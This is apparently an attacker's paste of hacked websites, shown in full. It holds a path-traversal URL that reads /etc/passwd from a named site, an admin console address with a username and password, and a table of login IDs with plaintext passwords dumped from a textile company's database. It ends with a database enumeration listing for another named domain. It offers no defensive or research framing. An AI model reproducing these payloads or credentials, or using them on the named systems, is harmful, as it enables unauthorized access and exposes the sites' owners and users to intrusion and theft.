http://laetto.com/wp3/asset/down.php?f=../../../../../etc/passwd


http://www.fateks.com/editconsole/index.php | turgay - 1234




https://www.fjltextiles.com/ 
+----+----------------+----------------+-----------+
| id | LoginID        | Password       | UseRights |
+----+----------------+----------------+-----------+
| 1  | admin          | oo@911!ABC@@   | 0         |
| 17 | ececexport2367 | !QAZxcvbGT%    | 0         |
| 18 | hoopon         | vm@89783844!@! | 0         |
+----+----------------+----------------+-----------+

http://www.microtek.com/

[*] gb2
[*] information_schema
[*] microtek_db
[*] mysql
[*] root_tmpdb
[*] spade
[*] test
[*] testdb
[*] Viruzel
[*] xsilver

